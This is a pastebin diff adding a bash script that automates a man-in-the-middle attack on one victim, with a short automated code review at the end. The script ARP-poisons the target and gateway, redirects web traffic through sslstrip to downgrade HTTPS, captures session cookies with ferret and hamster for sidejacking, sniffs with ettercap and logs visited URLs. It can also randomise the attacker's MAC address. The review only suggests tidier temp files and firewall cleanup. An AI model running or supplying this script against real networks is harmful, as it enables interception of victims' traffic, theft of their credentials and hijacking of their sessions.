View difference between Paste ID: SjHm7quG and
1-
1+
#!/bin/bash
2
3
# sidejackssl.sh v0.1
4
# tested in backtrack 4 R2 environment, run as root.
5
# xterm used for window control
6
# arpspoof poisons a single victim and gateway
7
# ferret and hamster for sidejacking
8
# sslstrip for https
9
# ettercap for everything else
10
# urlsnarf to monitor visited urls
11
# firefox needs to be configured with a proxy of 127.0.0.1:1234
12
# url for hamster server is http://hamster
13
# by gorara
14
15
# a few variables (do not change)
16
m1="0"					# missing file var m1
17
m2="0"					# missing file var m2
18
m3="0"					# missing file var m3
19
m4="0"					# missing file var m4
20
quickclean="0"				# used for quick clean up
21
randmac="n"				# default setting do not randomize MAC
22
hamsterfile="hamster.txt"		# hamster output file (you can't change it)
23
trap 'cleanup' SIGINT SIGTERM		# detect control-c
24
25
# a few more variables (change these if required)
26
27
# xterm window variables
28
x="0"					# x offset value
29
y="0"					# y offset value
30
width="120"				# width value
31
height="7"				# height value
32
yoffset="120"				# y offset
33
fgcolor="white"				# foreground color
34
bgcolor="black"				# background color
35
36
# style variables
37
warnstyle="[\e[01;38mw\e[00m]"		# warning msgs style
38
execstyle="[\e[01;32mx\e[00m]"		# execute msgs style
39
infostyle="[\e[01;34mi\e[00m]"		# informational msgs style
40
inputstyle="[\e[01;30m?\e[00m]"		# input msgs style
41
42
# file variables
43
sslstripfile="sslstrip.log"		# sslstrip output file name
44
snifffile="sniff-*"			# hamster sniff file wildcard
45
etterfile="etter.cap"			# ettercap output cap file
46
temp="/tmp"				# temporary dir
47
48
function usage
49
{
50
	clear
51
	echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
52
	echo ""
53
	echo "	-i interface	interface to use, ex. eth0, wlan0."
54
	echo "	-t target	the target IP address."
55
	echo "	-g gateway	the gateway IP address."
56
	echo "	-r		randomize your MAC address,"
57
	echo "			only use for wired interfaces."
58
	echo "	-h		display this help screen."
59
	echo ""
60
	echo "	examples: "
61
	echo "	 bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
62
	echo "	 bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
63
	echo ""
64
	exit 0
65
}
66
67
function cleanup() {
68
echo -e "\n$warnstyle control-c pressed! "
69
70
# exit script if nothing has been modified
71
if [[ "$quickclean" = "1" ]]; then
72
echo -e "$infostyle nothing changed, all done!"
73
exit 0
74
fi
75
76
echo -e "$infostyle cleaning up..."
77
echo -e "$execstyle flushing iptables..."
78
iptables -F
79
iptables -t nat -F
80
81
echo -e "$execstyle turning off IP forwarding..."
82
echo "0" > /proc/sys/net/ipv4/ip_forward
83
84
# change back MAC address to orignal one
85
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
86
echo -e "$execstyle resetting MAC address...";
87
echo -e "$infostyle original MAC is: $origmac"
88
ifconfig $interface down
89
ifconfig $interface hw ether $origmac
90
ifconfig $interface up
91
	if [ -z $gw ]; then
92
	echo -e "$warnstyle WARNING, you have no default gateway!"
93
	else
94
	route add default gw $gw
95
	fi
96
rm $temp/mac.orig
97
rm $temp/gw.orig
98
fi
99
100
echo -e "$execstyle cleaning up files..."
101
echo -e "$infostyle temp directory: "
102
103
# testing to see if files exist, if so display them...
104
	if [ -f $temp/$sslstripfile ]; then
105
	ls $temp/$sslstripfile
106
	else
107
	#echo -e "$warnstyle missing $sslstripfile"
108
	m1="1"
109
	fi
110
111
	if [ -f $temp/$etterfile ]; then
112
	ls $temp/$etterfile
113
	else
114
	#echo -e "$warnstyle missing $etterfile"
115
	m2="1"
116
	fi
117
118
echo -e "$infostyle current directory: "
119
120
	if [ -f $snifffile ]; then
121
	ls $snifffile
122
	else
123
	#echo -e "$warnstyle missing $snifffile"
124
	m3="1"
125
	fi
126
127
	if [ -f $hamsterfile ]; then
128
	ls $hamsterfile
129
	else
130
	#echo -e "$warnstyle missing $hamsterfile"
131
	m4="1"
132
	fi
133
134
# testing to see if there are any files at all
135
if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then
136
137
while [[ "$delete" != "y" || "$delete" != "n" ]]
138
139
echo -en "$infostyle delete file(s)? [y/n]: " 
140
read delete
141
142
do
143
    case "$delete" in
144
        y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
145
	n) echo -e "$warnstyle nothing deleted!"; break;;
146
    	*) echo -e "$warnstyle wrong selection!";
147
    esac
148
done
149
150
# delete files as requested
151
if [[ "$delete_marker" = "y" ]]; then
152
	if [ -f $temp/$sslstripfile ]; then
153
	rm $temp/$sslstripfile
154
	fi
155
156
	if [ -f $temp/$etterfile ]; then
157
	rm $temp/$etterfile
158
	fi
159
160
	if [ -f $snifffile ]; then
161
	rm $snifffile
162
	fi
163
164
	if [ -f $hamsterfile ]; then
165
	rm $hamsterfile
166
	fi
167
fi
168
169
else
170
171
	echo -e "$warnstyle nothing to delete!"
172
fi
173
174
echo -e "$infostyle all done!"
175
exit 0
176
}
177
178
179
# start main program
180
if [ "$#" -eq 0 ]; then
181
usage
182
fi
183
184
while [ "$#" -gt 0 ]
185
do
186
    case "$1" in
187
        -i)  interface=$2; shift 1;;
188
	-r)  randmac="y"; shift 1;;
189
	-t)  target=$2; shift 1;;
190
	-g)  gateway=$2; shift 1;;
191
	-h)  usage;;
192
	-*)  usage; break;;
193
	*)  break;;
194
    esac
195
    shift
196
done
197
198
# required parameters
199
if [[ -z $interface || -z $target || -z $gateway ]]; then
200
usage
201
exit 0
202
fi
203
204
clear
205
206
if [[ "$randmac" = "y" ]]; then
207
mac="yes"
208
else
209
mac="no"
210
fi
211
212
# set quick cleanup flag
213
quickclean="1"
214
215
echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
216
echo -e "$infostyle ctrl-c to abort at any time."
217
echo -e "$infostyle attack summary:"
218
echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
219
220
if [[ "$randmac" = "y" ]]; then 
221
222
echo -e "$execstyle change of $interface MAC address requested."
223
224
if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
225
echo -e "$infostyle wireless device detected..." 
226
echo -e "$warnstyle can't change MAC address without taking wifi interface down"
227
echo -e "$warnstyle do it manually before connecting to the AP."
228
exit 0
229
fi
230
231
if [[ "$interface" = eth* ]]; then
232
echo -e "$infostyle wired device detected..." 
233
echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
234
echo -en "$inputstyle do you want to continue? [y/n]: "
235
read continue
236
	if [[ "$continue" = "y" ]]; then
237
	echo -e "$infostyle proceeding..."
238
	else
239
	echo -e "$infostyle exiting..."
240
	exit 0	
241
	fi
242
fi
243
244
origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`
245
246
fi
247
248
# before this, ctrl-c will exit script without doing anything.
249
quickclean="0"
250
251
# use macchanger to randomize MAC address, ect.
252
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then 
253
echo -e "$execstyle randomizing MAC address...";
254
gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
255
ifconfig $interface down
256
macchanger -r $interface > $temp/mac.orig
257
ifconfig $interface up
258
	if [ -z $gw ]; then
259
	echo -e "$warnstyle WARNING, you have no default gateway!"
260
	else
261
	route add default gw $gw
262
	fi
263
origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
264
fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
265
echo -e "$infostyle original MAC is: $origmac"
266
echo -e "$infostyle faked    MAC is: $fakemac"
267
fi
268
269
echo -e "$execstyle turning on IP Forwarding..."
270
echo "1" > /proc/sys/net/ipv4/ip_forward
271
272
echo -e "$execstyle configuring iptables..."
273
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
274
sleep 1
275
276
echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
277
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
278
sleep 2
279
280
echo -e "$execstyle starting ferret   ... <logging to: console>"
281
y=$(($y+$yoffset))
282
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
283
sleep 2
284
285
echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
286
y=$(($y+$yoffset))
287
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
288
sleep 2
289
290
echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
291
y=$(($y+$yoffset))
292
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
293
sleep 2
294
295
echo -e "$execstyle starting urlsnarf ... <logging to: console>"
296
y=$(($y+$yoffset))
297
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
298
sleep 2
299
300
echo -e "$infostyle trap is ready, now to direct traffic..."
301
302
echo -e "$execstyle ARP poisoning the target..."
303
y=$(($y+$yoffset))
304
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
305
sleep 1
306
307
echo -e "$infostyle run firefox and type http://hamster"
308
echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
309
echo -e "$infostyle press ctrl-c to exit and clean up... \n"
310
for ((;;)) do 
311
read loop
312
echo -en "$infostyle press ctrl-c to terminate!"
313
done
314
315
exit 0
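Review bot: The capture outputs are written as root to fixed names in a shared directory (`temp="/tmp"`, then `$temp/$sslstripfile`, `$temp/$etterfile`, `$temp/mac.orig` and `$temp/gw.orig`), so a symlink already present at one of those paths would be followed, and the files holding intercepted traffic get whatever umask root happens to have. On an authorised engagement those captures are client data and belong in a private directory, for example `umask 077` followed by `temp=$(mktemp -d) || exit 1` in place of the fixed path. Separately, cleanup() runs `iptables -F` and `iptables -t nat -F`, which removes every rule in both tables rather than the single PREROUTING redirect added at gutter line 273, and it writes 0 to ip_forward instead of restoring the value found at start-up. Deleting the exact rule with `-D` and restoring a saved ip_forward value would leave the host's firewall and routing state as it was found.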